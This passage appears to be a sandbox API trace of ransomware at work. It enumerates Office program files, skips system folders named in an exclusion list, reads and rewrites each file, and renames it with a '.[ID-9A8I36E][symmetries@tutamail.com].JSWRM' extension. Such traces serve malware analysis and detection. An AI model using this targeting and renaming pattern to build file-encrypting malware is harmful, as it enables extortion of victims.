lpWideCharStr="RESENDS.ICO", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RESENDS.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RESENDS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\resends.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.106] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.106] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.106] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.108] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.108] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.108] CloseHandle (hObject=0x314) returned 1 [0130.108] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RESENDS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\resends.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RESENDS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\resends.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.109] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x314, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="RSSITEM.CFG", cAlternateFileName="")) returned 1 [0130.109] lstrcmpiW (lpString1="RSSITEM.CFG", lpString2=".") returned 1 [0130.109] lstrcmpiW (lpString1="RSSITEM.CFG", lpString2="..") returned 1 [0130.109] lstrcmpiW (lpString1="RSSITEM.CFG", lpString2="...") returned 1 [0130.109] lstrcmpiW (lpString1="RSSITEM.CFG", lpString2="windows") returned -1 [0130.109] lstrcmpiW (lpString1="RSSITEM.CFG", lpString2="recovery") returned 1 [0130.109] lstrcmpiW (lpString1="RSSITEM.CFG", lpString2="perflogs") returned 1 [0130.109] lstrcmpiW (lpString1="RSSITEM.CFG", lpString2="documents and settings") returned 1 [0130.109] lstrcmpiW (lpString1="RSSITEM.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.109] lstrcmpiW (lpString1="RSSITEM.CFG", lpString2="system volume information") returned -1 [0130.109] lstrcmpiW (lpString1="RSSITEM.CFG", lpString2="msocache") returned 1 [0130.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSSITEM.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSSITEM.CFG", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RSSITEM.CFG", lpUsedDefaultChar=0x0) returned 11 [0130.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSSITEM.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSSITEM.CFG", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RSSITEM.CFG", lpUsedDefaultChar=0x0) returned 11 [0130.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RSSITEM.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\rssitem.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.110] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=788) returned 1 [0130.110] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.110] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x310, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x310, lpOverlapped=0x0) returned 1 [0130.112] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.112] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x310, lpOverlapped=0x0) returned 1 [0130.112] CloseHandle (hObject=0x314) returned 1 [0130.112] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RSSITEM.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\rssitem.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RSSITEM.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\rssitem.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.113] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4881c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4881c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4881c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="RSSITEML.ICO", cAlternateFileName="")) returned 1 [0130.113] lstrcmpiW (lpString1="RSSITEML.ICO", lpString2=".") returned 1 [0130.113] lstrcmpiW (lpString1="RSSITEML.ICO", lpString2="..") returned 1 [0130.113] lstrcmpiW (lpString1="RSSITEML.ICO", lpString2="...") returned 1 [0130.113] lstrcmpiW (lpString1="RSSITEML.ICO", lpString2="windows") returned -1 [0130.113] lstrcmpiW (lpString1="RSSITEML.ICO", lpString2="recovery") returned 1 [0130.113] lstrcmpiW (lpString1="RSSITEML.ICO", lpString2="perflogs") returned 1 [0130.113] lstrcmpiW (lpString1="RSSITEML.ICO", lpString2="documents and settings") returned 1 [0130.113] lstrcmpiW (lpString1="RSSITEML.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.113] lstrcmpiW (lpString1="RSSITEML.ICO", lpString2="system volume information") returned -1 [0130.113] lstrcmpiW (lpString1="RSSITEML.ICO", lpString2="msocache") returned 1 [0130.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSSITEML.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSSITEML.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RSSITEML.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSSITEML.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSSITEML.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RSSITEML.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RSSITEML.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\rssiteml.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.114] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.115] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.115] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.116] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.116] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.116] CloseHandle (hObject=0x314) returned 1 [0130.116] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RSSITEML.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\rssiteml.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RSSITEML.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\rssiteml.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.117] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4881c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4881c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4881c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="RSSITEMS.ICO", cAlternateFileName="")) returned 1 [0130.117] lstrcmpiW (lpString1="RSSITEMS.ICO", lpString2=".") returned 1 [0130.117] lstrcmpiW (lpString1="RSSITEMS.ICO", lpString2="..") returned 1 [0130.117] lstrcmpiW (lpString1="RSSITEMS.ICO", lpString2="...") returned 1 [0130.117] lstrcmpiW (lpString1="RSSITEMS.ICO", lpString2="windows") returned -1 [0130.117] lstrcmpiW (lpString1="RSSITEMS.ICO", lpString2="recovery") returned 1 [0130.117] lstrcmpiW (lpString1="RSSITEMS.ICO", lpString2="perflogs") returned 1 [0130.117] lstrcmpiW (lpString1="RSSITEMS.ICO", lpString2="documents and settings") returned 1 [0130.117] lstrcmpiW (lpString1="RSSITEMS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.117] lstrcmpiW (lpString1="RSSITEMS.ICO", lpString2="system volume information") returned -1 [0130.117] lstrcmpiW (lpString1="RSSITEMS.ICO", lpString2="msocache") returned 1 [0130.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSSITEMS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSSITEMS.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RSSITEMS.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSSITEMS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSSITEMS.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RSSITEMS.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RSSITEMS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\rssitems.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.119] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.119] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.119] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.121] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.121] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.121] CloseHandle (hObject=0x314) returned 1 [0130.121] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RSSITEMS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\rssitems.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RSSITEMS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\rssitems.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.122] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4881c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4881c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4881c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SCDCNCLL.ICO", cAlternateFileName="")) returned 1 [0130.122] lstrcmpiW (lpString1="SCDCNCLL.ICO", lpString2=".") returned 1 [0130.122] lstrcmpiW (lpString1="SCDCNCLL.ICO", lpString2="..") returned 1 [0130.122] lstrcmpiW (lpString1="SCDCNCLL.ICO", lpString2="...") returned 1 [0130.122] lstrcmpiW (lpString1="SCDCNCLL.ICO", lpString2="windows") returned -1 [0130.122] lstrcmpiW (lpString1="SCDCNCLL.ICO", lpString2="recovery") returned 1 [0130.122] lstrcmpiW (lpString1="SCDCNCLL.ICO", lpString2="perflogs") returned 1 [0130.122] lstrcmpiW (lpString1="SCDCNCLL.ICO", lpString2="documents and settings") returned 1 [0130.122] lstrcmpiW (lpString1="SCDCNCLL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.123] lstrcmpiW (lpString1="SCDCNCLL.ICO", lpString2="system volume information") returned -1 [0130.123] lstrcmpiW (lpString1="SCDCNCLL.ICO", lpString2="msocache") returned 1 [0130.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDCNCLL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDCNCLL.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDCNCLL.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDCNCLL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDCNCLL.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDCNCLL.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDCNCLL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdcncll.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.123] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.123] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.123] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.128] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.128] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.128] CloseHandle (hObject=0x314) returned 1 [0130.128] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDCNCLL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdcncll.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDCNCLL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdcncll.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.130] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4881c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SCDCNCLS.ICO", cAlternateFileName="")) returned 1 [0130.130] lstrcmpiW (lpString1="SCDCNCLS.ICO", lpString2=".") returned 1 [0130.130] lstrcmpiW (lpString1="SCDCNCLS.ICO", lpString2="..") returned 1 [0130.130] lstrcmpiW (lpString1="SCDCNCLS.ICO", lpString2="...") returned 1 [0130.130] lstrcmpiW (lpString1="SCDCNCLS.ICO", lpString2="windows") returned -1 [0130.130] lstrcmpiW (lpString1="SCDCNCLS.ICO", lpString2="recovery") returned 1 [0130.130] lstrcmpiW (lpString1="SCDCNCLS.ICO", lpString2="perflogs") returned 1 [0130.130] lstrcmpiW (lpString1="SCDCNCLS.ICO", lpString2="documents and settings") returned 1 [0130.130] lstrcmpiW (lpString1="SCDCNCLS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.130] lstrcmpiW (lpString1="SCDCNCLS.ICO", lpString2="system volume information") returned -1 [0130.130] lstrcmpiW (lpString1="SCDCNCLS.ICO", lpString2="msocache") returned 1 [0130.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDCNCLS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDCNCLS.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDCNCLS.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDCNCLS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDCNCLS.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDCNCLS.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDCNCLS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdcncls.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.131] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.131] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.131] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, 